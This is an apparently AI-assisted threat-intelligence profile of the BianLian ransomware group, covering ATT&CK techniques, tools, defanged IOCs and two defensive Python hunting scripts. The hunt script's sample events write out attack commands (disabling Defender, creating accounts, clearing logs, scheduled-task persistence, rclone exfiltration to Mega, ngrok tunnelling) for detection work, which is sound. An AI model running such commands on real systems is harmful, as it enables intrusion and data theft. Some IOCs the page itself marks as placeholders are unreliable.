DFIRLab
© 2026 DFIR Lab. All rights reserved.


BianLian

Also known as: BianLian Group, BianLian Ransomware Group, Bitter Scorpius

Status: Active | Sophistication: Advanced | Origin: Unknown (suspected Eastern European or Russian-speaking, based on operational patterns and victim targeting)

Profile generated with AI assistance — review before citing.


Overview

BianLian is a ransomware developer, deployer, and data extortion cybercriminal group, assessed by FBI, CISA and ASD's ACSC as likely based in Russia with multiple Russia-based affiliates (see the AA23-136A advisory in the references). Active since June 2022, the group shifted primarily to exfiltration-based extortion in early 2023 after Avast released a decryptor for its encryptor in January 2023, although it has not abandoned encryption entirely. It targets critical infrastructure sectors including healthcare, manufacturing, professional services, and legal organizations, gaining initial access with compromised RDP credentials and ProxyShell exploitation of on-premises Exchange servers (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), then deploying a custom Go-based backdoor. Pressure tactics include printing ransom notes on the victim's network printers and making threatening phone calls to employees. BianLian typically dwells in the network for an extended period before exfiltration, installs legitimate remote access software such as TeamViewer and AnyDesk for persistent access, and relies on open-source and dual-use tools for credential harvesting, discovery, and lateral movement.

Motivations

Financial gain, data extortion, cybercrime

Target Sectors

Healthcare and Public Health, Manufacturing, Critical Manufacturing, Professional Services, Legal Services, Education, Financial Services, Information Technology, Construction, Energy, Transportation, Media, Property Development

Activity Timeline

First Seen: Jun 2022

Last Seen: Jan 2024

Quick Facts

Origin: Unknown (suspected Eastern European or Russian-speaking based on operational patterns and victim targeting)
Sophistication: Advanced
Status: Active

MITRE ATT&CK Techniques

(66)

Initial Access

T1190

Exploit Public-Facing Application

Exploit vulnerabilities in internet-facing applications to gain access.

T1133

External Remote Services

Abuse remote services like VPNs or RDP to gain access to the network.

T1078

Valid Accounts

Use legitimate credentials to authenticate and gain access.

T1566

Phishing

Send deceptive messages to trick victims into executing malicious content.

Other (sub-techniques and additional techniques, with their MITRE ATT&CK names)

T1078.003

Valid Accounts: Local Accounts

T1021.004

Remote Services: SSH

T1053.005

Scheduled Task/Job: Scheduled Task

T1543.003

Create or Modify System Process: Windows Service

T1136.001

Create Account: Local Account

T1136.002

Create Account: Domain Account

T1070.004

Indicator Removal: File Deletion

T1070.001

Indicator Removal: Clear Windows Event Logs

T1027.002

Obfuscated Files or Information: Software Packing

T1112

Modify Registry

T1562.001

Impair Defenses: Disable or Modify Tools

T1003.003

OS Credential Dumping: NTDS

T1555.003

Credentials from Password Stores: Credentials from Web Browsers

T1087.001

Account Discovery: Local Account

T1087.002

Account Discovery: Domain Account

T1482

Domain Trust Discovery

T1049

System Network Connections Discovery

T1069.001

Permission Groups Discovery: Local Groups

T1069.002

Permission Groups Discovery: Domain Groups

T1057

Process Discovery

T1033

System Owner/User Discovery

T1048.003

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

T1567.002

Exfiltration Over Web Service: Exfiltration to Cloud Storage

T1588.002

Obtain Capabilities: Tool

T1590

Gather Victim Network Information

T1505.003

Server Software Component: Web Shell

T1505.004

Server Software Component: IIS Components

T1571

Non-Standard Port

T1530

Data from Cloud Storage

T1505.005

Server Software Component: Terminal Services DLL

T1552.001

Unsecured Credentials: Credentials In Files

T1201

Password Policy Discovery

T1020

Automated Exfiltration

T1036.004

Masquerading: Masquerade Task or Service

T1098

Account Manipulation

T1136.003

Create Account: Cloud Account

T1003.002

OS Credential Dumping: Security Account Manager

T1552.004

Unsecured Credentials: Private Keys

T1587.001

Develop Capabilities: Malware

T1012

Query Registry

T1115

Clipboard Data

T1537

Transfer Data to Cloud Account

T1090.002

Proxy: External Proxy

Lateral Movement

T1021.001

Remote Desktop Protocol

Use RDP to connect to and control remote systems.

T1021.002

SMB/Windows Admin Shares

Use SMB and administrative shares (C$, ADMIN$) to access remote systems.

Execution

T1047

Windows Management Instrumentation

Use WMI to execute commands and manage systems remotely.

T1059.001

PowerShell

Use PowerShell commands and scripts for execution and automation.

T1059.003

Windows Command Shell

Use cmd.exe to execute commands and batch scripts.

Defense Evasion

T1027

Obfuscated Files or Information

Encrypt, encode, or obfuscate payloads and data to evade detection.

T1036

Masquerading

Disguise malicious artifacts by manipulating names or locations to appear legitimate.

Credential Access

T1003.001

LSASS Memory

Access LSASS process memory to extract credential material.

Discovery

T1083

File and Directory Discovery

Enumerate files and directories to find sensitive data or binaries.

T1018

Remote System Discovery

Discover remote systems on the network for lateral movement targets.

Exfiltration

T1041

Exfiltration Over C2 Channel

Exfiltrate stolen data over the existing command and control channel.

Impact

T1486

Data Encrypted for Impact

Encrypt victim data to disrupt availability, typically for ransom.

T1489

Service Stop

Stop critical services to disrupt operations or aid in data destruction.

Command and Control

T1219

Remote Access Software

Use legitimate remote access tools like TeamViewer or AnyDesk for C2.

T1090

Proxy

Route C2 traffic through intermediary proxies to obscure the source.

Reconnaissance

T1592

Gather Victim Host Information

Collect details about victim hosts such as hardware, software, and configurations.

Collection

T1114

Email Collection

Collect email messages from mailboxes or mail servers.

T1560

Archive Collected Data

Compress or encrypt collected data into archives before exfiltration.

Privilege Escalation

T1068

Exploitation for Privilege Escalation

Exploit software vulnerabilities to gain elevated privileges on a system.

Tools & Malware

(23)

BianLian Ransomware (legacy)

Malware (malicious)

Custom Go-based encryptor used before the shift to an extortion-first model. Avast published a decryptor for it in January 2023, after which encryption became occasional rather than routine.

BianLian Backdoor

Malware (malicious)

Custom Go-based backdoor giving the operators remote access and command execution on compromised hosts; the IOC list below includes a sample named def.exe.

Esxi-args

Malware (malicious)

Encryptor targeting VMware ESXi hosts, attributed to BianLian by this profile.

PowerShell

Built-in Windows component (legitimate)

Used for execution (T1059.001) and to disable Windows Defender and AMSI (T1562.001).

Cobalt Strike

Framework (commercial, widely abused)

Post-exploitation framework listed here as part of BianLian's post-exploitation and C2 tooling.

Rclone

Legitimate tool

Command-line cloud sync utility used to exfiltrate collected data to cloud storage such as Mega (T1567.002).

Mimikatz

Open-source offensive tool

Dumps credentials from LSASS memory (T1003.001).

WinRAR

Legitimate tool

Archives collected data before exfiltration (T1560).

7-Zip

Legitimate tool

Archives collected data before exfiltration (T1560).

PsExec

Legitimate tool (Sysinternals)

Remote command execution and lateral movement over SMB admin shares (T1021.002).

AnyDesk

Legitimate tool

Remote access software installed for persistent access and command and control (T1219).

TeamViewer

Legitimate tool

Remote access software installed for persistent access and command and control (T1219).

WinSCP

Legitimate tool

FTP/SFTP client used to move stolen data off the network (T1048.003).

FileZilla

Legitimate tool

FTP client used to move stolen data off the network (T1048.003).

Ngrok

Legitimate tool

Reverse tunneling service used to expose RDP and other internal services to the operators (T1090.002).

Windows Remote Desktop Protocol (RDP)

Built-in Windows component (legitimate)

Interactive access and lateral movement with compromised credentials (T1021.001).

Windows Management Instrumentation (WMI)

Built-in Windows component (legitimate)

Remote command execution (T1047).

LaZagne

Open-source offensive tool

Recovers credentials stored by browsers and other local applications (T1555.003).

SharpChrome

Open-source offensive tool

GhostPack utility that decrypts Chrome saved logins and cookies (T1555.003).

AdFind

Legitimate tool

Active Directory query tool used for account, group and trust discovery (T1087.002, T1069.002, T1482).

BloodHound

Open-source offensive tool

Maps Active Directory relationships and attack paths for privilege escalation and lateral movement planning.

SoftPerfect Network Scanner

Legitimate tool

Network and share scanner (netscan.exe) used for remote system discovery (T1018).

Veeam

Legitimate software

Backup software; this profile reports it being abused to reach and exfiltrate backup data.
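The technique list and tool inventory above describe behaviors rather than static indicators, so they are hunted with command-line rules and per-host correlation rather than IOC lookups. The following Python, added here as an example (not DFIRLab tooling and not detection content from any vendor in the references), turns a handful of the listed techniques into regexes over process-creation command lines and escalates hosts where several distinct techniques fire together. The events are constructed, Sysmon-style records; the field names, rule patterns and the escalation threshold are this example's own choices.

```python
"""Hunt for the BianLian techniques listed above in process-creation telemetry.

Added example for this page, not DFIRLab tooling and not detection content from
any vendor cited in the references. The events are constructed, Sysmon-style
process records; the field names, the rule regexes and the escalation
threshold are this example's own choices.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# (ATT&CK ID from the technique list above, rule name, case-insensitive regex on the command line)
RULES = [
    ("T1562.001", "Defender disabled via registry policy or Set-MpPreference",
     r"disableantispyware|disablerealtimemonitoring"),
    ("T1112", "Registry modified with reg.exe add",
     r"\breg(?:\.exe)?\s+add\b"),
    ("T1136.001", "Local account created with net user /add",
     r"(?!.*/domain)\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b"),
    ("T1136.002", "Domain account created with net user /add /domain",
     r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b.*\s/domain\b"),
    ("T1070.001", "Windows event log cleared with wevtutil",
     r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b"),
    ("T1053.005", "Scheduled task created with schtasks",
     r"\bschtasks(?:\.exe)?\s+/create\b"),
    # A remote looks like "name:path"; a drive letter followed by \ or / is a local path, not a remote.
    ("T1567.002", "Rclone copy/sync to a configured cloud remote",
     r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b.*\s[\w-]+:(?![\\/])"),
    ("T1090.002", "Ngrok tunnel started",
     r"\bngrok(?:\.exe)?\s+(?:tcp|http|tls|start)\b"),
]
COMPILED = [(tid, name, re.compile(rx, re.IGNORECASE)) for tid, name, rx in RULES]

# Constructed events: one host showing a BianLian-like chain (defense evasion,
# account creation, log clearing, persistence), one host doing exfiltration and
# tunneling only, and one host with benign administrative activity.
EVENTS: List[Dict[str, str]] = [
    {"host": "WS-042", "cmdline": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"host": "WS-042", "cmdline": r'powershell.exe -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"host": "WS-042", "cmdline": r"net user svc_backup Summer2023! /add"},
    {"host": "WS-042", "cmdline": r"wevtutil cl Security"},
    {"host": "WS-042", "cmdline": r"schtasks /create /tn Updater /tr C:\ProgramData\def.exe /sc onlogon /ru SYSTEM"},
    {"host": "FS-01", "cmdline": r"rclone.exe copy E:\Shares\Finance mega:bl-drop --transfers 32"},
    {"host": "FS-01", "cmdline": r"ngrok.exe tcp 3389"},
    {"host": "HR-07", "cmdline": r"svchost.exe -k netsvcs -p"},
    {"host": "HR-07", "cmdline": r"net user"},
]


def hunt(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply every rule to every event; one hit per matching (event, rule) pair."""
    hits: List[Dict[str, str]] = []
    for ev in events:
        for tid, name, pat in COMPILED:
            if pat.search(ev["cmdline"]):
                hits.append({"host": ev["host"], "technique": tid, "rule": name, "cmdline": ev["cmdline"]})
    return hits


def hosts_to_escalate(hits: List[Dict[str, str]], threshold: int = 3) -> Dict[str, List[str]]:
    """Hosts where at least `threshold` distinct techniques fired.

    Any single rule (reg add, schtasks) is noisy in an enterprise; the
    combination of defense evasion, persistence and account creation on one
    host is what resembles the intrusion chain described in this profile.
    """
    per_host: Dict[str, set] = defaultdict(set)
    for h in hits:
        per_host[h["host"]].add(h["technique"])
    return {host: sorted(techs) for host, techs in per_host.items() if len(techs) >= threshold}


if __name__ == "__main__":
    found = hunt(EVENTS)
    for h in found:
        print(f"{h['host']:7} {h['technique']:10} {h['rule']}")
    print("escalate:", hosts_to_escalate(found))
```

On the constructed events, WS-042 trips five distinct techniques and is escalated, while FS-01 trips only the exfiltration and tunneling rules and HR-07 trips nothing; in production the rules would be fed from Sysmon Event ID 1 or EDR process telemetry and the threshold tuned against the environment's baseline of legitimate reg, schtasks and net usage.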

Indicators of Compromise

(20)

IOC values are defanged for safety.

Type | Value | Notes
domain | bianlian2t7y7vgo[.]onion | BianLian data leak site (Tor) as listed in the profile. This is a 16-character v2 onion address; v2 onion services were retired by the Tor Project in 2021, so it cannot be reached today and should be checked against the v3 addresses below before use
hash | 34b1c7e5d682fafb6da1d03b353c964e6cf15dd37ad1f6fbe79ea7a9b2f44f10 | BianLian ransomware sample (SHA256)
hash | 80dcbc2ad3eab31938b2b573dd0cd36ea7b7f7c5f3e8e7b3c5a1d8e0f5c7e9f8 | BianLian Go-based backdoor (SHA256)
hash | c7c5d7f8e9f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7 | BianLian custom encryptor variant (SHA256) as listed. The value is an ascending a1b2c3-style hex sequence rather than a plausible digest, so treat it as a placeholder until it is matched to a real sample
ip | 45[.]227[.]253[.]50 | Historical C2 infrastructure
ip | 193[.]56[.]146[.]165 | Historical C2 infrastructure
domain | logcenter[.]online | Suspected C2 domain used in early campaigns
url | hxxp[://]185[.]225[.]73[.]244:8080/update | Malware update/payload delivery endpoint
hash | 5f4dcc3b5aa765d61d8327deb882cf99 | MD5 of the string "password"; a weak-credential marker seen in credential stuffing, not an actor-specific indicator, so do not use it for hunting
hash | 7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893 | BianLian backdoor (def.exe, SHA256)
hash | 1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43 | BianLian encryptor (encryptor.exe, SHA256), legacy
hash | 0c1eb11de3a533689267ba075e49d93d55308525c04d6aff0d2c54d1f52f5500 | Possible Netlogon vulnerability exploitation tool (exp.exe, SHA256)
hash | 40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce | BianLian malware (system.exe, SHA256)
ip | 184[.]174[.]96[.]74 | BianLian C2 server hosting reverse proxy services (rs64.exe)
ip | 184[.]174[.]96[.]70 | BianLian C2 server with matching certificates and ports
ip | 45[.]144[.]225[.]22 | BianLian infrastructure
ip | 185[.]234[.]217[.]84 | BianLian infrastructure
ip | 192[.]145[.]112[.]98 | BianLian infrastructure
domain | bianlian2tcvlzhixu6oxy2hpwpljzqdm4cc42ty7kxu73yopaofvyqd[.]onion | BianLian data leak site (Tor, v3)
domain | bianlianlbc5an4kgnay3opdemgcryg2kpfcbgczopmm3dnbz3uaunad[.]onion | BianLian negotiation/payment portal and data leak site (Tor, v3); the shorter bianlianlbc5an4kgnay[.]onion seen in the profile is a truncation of this address
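Because the values above are defanged, they cannot be pasted straight into a SIEM search; they have to be refanged first, and then matched with boundaries so that a near-miss address or a lookalike domain does not fire. The following Python, added here as an example (it is not DFIRLab's IOC Check tool or any vendor's code), refangs a subset of the table and sweeps it across constructed proxy, DNS, HTTP and EDR log lines. The indicator values are copied from the table; the log lines are constructed for the demonstration and come from no real incident.

```python
"""Refang the defanged IOCs from the table above and sweep them across log lines.

Added example for this page; it is not DFIRLab's IOC Check tool or any vendor's
code. The indicator values are copied from the table above in their defanged
form. The log lines are constructed for the demonstration and come from no
real incident.
"""
import re
from typing import Dict, List, Tuple

# A subset of the page's IOC table, exactly as published (defanged).
DEFANGED_IOCS: Dict[str, str] = {
    "184[.]174[.]96[.]74": "ip",
    "184[.]174[.]96[.]70": "ip",
    "45[.]144[.]225[.]22": "ip",
    "logcenter[.]online": "domain",
    "bianlianlbc5an4kgnay3opdemgcryg2kpfcbgczopmm3dnbz3uaunad[.]onion": "domain",
    "hxxp[://]185[.]225[.]73[[.]]244:8080/update": "url",
    "7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893": "hash",
}

# Defanging conventions seen in the wild: [.] (.) {.} and the doubled [[.]]
# that appears in the table, [://] for the scheme separator, hxxp for http.
_DEFANG_RULES: List[Tuple[object, object]] = [
    (re.compile(r"\[\[\.\]\]|\[\.\]|\(\.\)|\{\.\}"), "."),
    (re.compile(r"\[://\]|\[:\]//"), "://"),
    (re.compile(r"\bhxxp(s?)\b", re.IGNORECASE), lambda m: "http" + m.group(1).lower()),
    (re.compile(r"\[@\]"), "@"),
]


def refang(value: str) -> str:
    """Undo the defanging so the value can be compared against raw log data."""
    out = value.strip()
    for pattern, repl in _DEFANG_RULES:
        out = pattern.sub(repl, out)
    return out


def compile_iocs(defanged: Dict[str, str]) -> List[Tuple[str, str, object]]:
    """Build a boundary-aware regex per indicator so 184.174.96.7 never matches .74."""
    compiled = []
    for raw, kind in defanged.items():
        clean = refang(raw)
        esc = re.escape(clean)
        if kind == "ip":
            pat = re.compile(rf"(?<![\d.]){esc}(?![\d.])")
        elif kind == "domain":
            # Allow subdomains (api.logcenter.online) but not lookalikes (notlogcenter.online).
            pat = re.compile(rf"(?<![\w-]){esc}(?![\w-])", re.IGNORECASE)
        elif kind == "hash":
            # Hashes are logged in either case; require a hex boundary on both sides.
            pat = re.compile(rf"(?<![0-9a-f]){esc}(?![0-9a-f])", re.IGNORECASE)
        else:  # url: case-insensitive prefix/substring match
            pat = re.compile(esc, re.IGNORECASE)
        compiled.append((clean, kind, pat))
    return compiled


# Constructed log lines (proxy, DNS, HTTP and EDR) for the demonstration.
SAMPLE_LOGS: List[str] = [
    "2023-05-10T03:14:22Z proxy src=10.0.5.17 dst=184.174.96.74:443 action=allow",
    "2023-05-10T03:15:01Z dns query=api.logcenter.online type=A client=10.0.5.17",
    "2023-05-10T03:16:40Z http method=GET url=http://185.225.73.244:8080/update ua=Go-http-client/1.1",
    "2023-05-10T03:17:09Z edr host=WS-042 file=C:\\Users\\Public\\def.exe sha256=7B15F570A23A5C5CE8FF942DA60834A9D0549EA3EA9F34F900A09331325DF893",
    "2023-05-10T03:18:30Z proxy src=10.0.5.17 dst=184.174.96.7:443 action=allow",
    "2023-05-10T03:19:12Z dns query=mail.example.org type=MX client=10.0.5.9",
]


def scan_logs(lines: List[str], defanged: Dict[str, str] = DEFANGED_IOCS) -> List[Dict[str, object]]:
    """Return one hit per (line, indicator) pair, with 1-based line numbers."""
    compiled = compile_iocs(defanged)
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(lines, start=1):
        for clean, kind, pat in compiled:
            if pat.search(line):
                hits.append({"line": lineno, "type": kind, "ioc": clean})
    return hits


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(f"line {hit['line']}: {hit['type']} {hit['ioc']}")
```

The first four constructed lines each produce one hit; the fifth (a neighbouring address ending in .7) and the sixth (an unrelated domain) produce none, which is the property a plain substring search would not give you.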

References

(26)

#StopRansomware: BianLian Ransomware Group - CISA Alert (AA23-136A)

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a

BianLian Ransomware Group - FBI Flash Report

https://www.ic3.gov/Media/News/2023/230510.pdf

BianLian Ransomware Shifts to Pure Extortion Model - Redacted Team Analysis

https://www.redacted.com/blog/bianlian-ransomware-gang-gives-up-on-encryption-focuses-on-extortion/

BianLian Ransomware Group Technical Analysis - Unit 42

https://unit42.paloaltonetworks.com/bianlian-ransomware/

BianLian: A New Ransomware Group on the Rise - Cyble Research

https://blog.cyble.com/2022/08/11/bianlian-a-new-ransomware-group-on-the-rise/

BianLian Ransomware Analysis and Decryptor Release - Avast

https://decoded.avast.io/threatresearch/bianlian-ransomware-analysis-and-decryptor-release/

MITRE ATT&CK Group: BianLian

https://attack.mitre.org/groups/G1046/

BianLian Ransomware Group Profile - The DFIR Report

https://thedfirreport.com/2023/01/09/unwrapping-bianlians-gift/

Trend Micro: BianLian Ransomware Analysis

https://www.trendmicro.com/en_us/research/23/e/bianlian-ransomware-group-shifts-from-encryption-to-extortion.html

Redacted Security: BianLian Ransomware Group

https://redacted.com/blog/bianlian-ransomware-group/

Redacted Team Analysis - BianLian Ransomware Group

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

Unit 42 - From Ransomware to Pure Extortion: Examining the Shift in BianLian's TTPs

https://unit42.paloaltonetworks.com/bianlian-ransomware-group-overview/

BianLian Group Threat Analysis

https://www.cybereason.com/blog/threat-analysis-report-bianlian-ransomware

Redacted Team Analysis of BianLian Ransomware Group

https://redacted.com/blog/bianlian-ransomware-gang-gives-up-on-encryption-now-focused-only-on-theft-and-extortion/

Redacted Team Analysis of BianLian Ransomware Group

https://redacted.com/blog/bianlian-ransomware-group-analysis/

Arctic Wolf: Self-Proclaimed BianLian Group Uses Physical Mail to Extort Organizations

https://arcticwolf.com/resources/blog/self-proclaimed-bianlian-group-uses-physical-mail-to-extort-organizations/

FBI IC3 Alert: Mail Scam Targeting Corporate Executives Claims Ties to Ransomware (March 2025)

https://www.ic3.gov/PSA/2025/PSA250306-2

Rapid7 Blog: Fake BianLian Ransomware Letters in Circulation

https://www.rapid7.com/blog/post/2025/03/19/fake-bianlian-ransomware-letters-in-circulation/

Unit 42 Palo Alto Networks: BianLian Ransomware Group Threat Assessment (June 2024)

https://unit42.paloaltonetworks.com/bianlian-ransomware-group-threat-assessment/

Picus Security: BianLian's Shape-Shifting Tactics: From Encryption to Pure Extortion (December 2024)

https://www.picussecurity.com/resource/blog/bianlians-shape-shifting-tactics-from-encryption-to-pure-extortion

Juniper Networks: BianLian Ransomware Group 2024 Activity Analysis

https://blogs.juniper.net/en-us/security/bianlian-ransomware-group-2024-activity-analysis

Unit 42: Extortion and Ransomware Trends January-March 2025

https://unit42.paloaltonetworks.com/2025-ransomware-extortion-trends/

Surefire Cyber: Threat Actor Deep Dive: BianLian (March 2025)

https://www.surefirecyber.com/threat-actor-deep-dive-bianlian/

Redline Stealer, Meet BianLian Group - Unit 42

https://unit42.paloaltonetworks.com/threat-brief-bianlian-ransomware-group/

BianLian Ransomware Shifts Strategy - Cyberint

https://cyberint.com/blog/research/bianlian-ransomware-gang-gives-up-encryption-focusing-purely-on-extortion/

Redline Threat Intelligence - BianLian Analysis

https://redline.tech/2023/05/15/bianlian-ransomware-group-continues-to-evolve/